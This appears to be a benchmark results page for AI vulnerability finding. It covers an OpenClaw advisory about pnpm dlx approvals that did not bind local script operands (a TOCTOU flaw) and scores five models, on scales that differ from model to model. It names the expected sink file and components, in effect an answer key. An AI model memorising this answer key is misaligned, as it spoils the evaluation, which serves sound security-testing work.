SeverityMODERATE
Repositoryopenclaw/openclaw
PublishedApr 7, 2026, 6:15 PM
Ref7cea7c29705b188b464cc9cdc107c275b94b2a72
Advisory summary
OpenClaw: pnpm dlx approvals did not bind local script operands
Curator analysis
Synopsis
`pnpm dlx` approval planning in the node-host did not bind mutable local script operands, so an approved local script could be changed before execution without invalidating the approval plan.
Vulnerability classes
approval integritytime-of-check time-of-use (TOCTOU)
Sink hints
src/node-host/invoke-system-run-plan.ts
This file contains the node-host approval-plan builder, package-manager command unwrapping, and mutable file operand snapshot/revalidation logic. The fix adds `pnpm dlx`-specific parsing and fail-closed binding here.
Expected components
node-host command-planning pathpnpm dlx approval planningmutable file operand binding
Model scores(5)
moonshotai/kimi-k2.5excellent
93.00View trace
Target Alignment
29
Source To Sink Reasoning
28
Impact And Exploitability
18
Evidence Quality
9
Overclaim Control
9
google/gemini-3.1-pro-previewexcellent
93.00View trace
Target Alignment
29
Source To Sink Reasoning
29
Impact And Exploitability
18
Evidence Quality
8
Overclaim Control
9
openai/gpt-5.4excellent
93.00View trace
Target Alignment
29
Source To Sink Reasoning
29
Impact And Exploitability
17
Evidence Quality
10
Overclaim Control
8
anthropic/claude-opus-4.6excellent
92.00View trace
Target Alignment
9.8
Source To Sink Reasoning
9.6
Impact And Exploitability
8.8
Evidence Quality
8.9
Overclaim Control
8.7
z-ai/glm-5.1excellent
89.90View trace
Target Alignment
90
Source To Sink Reasoning
92
Impact And Exploitability
88
Evidence Quality
95
Overclaim Control
82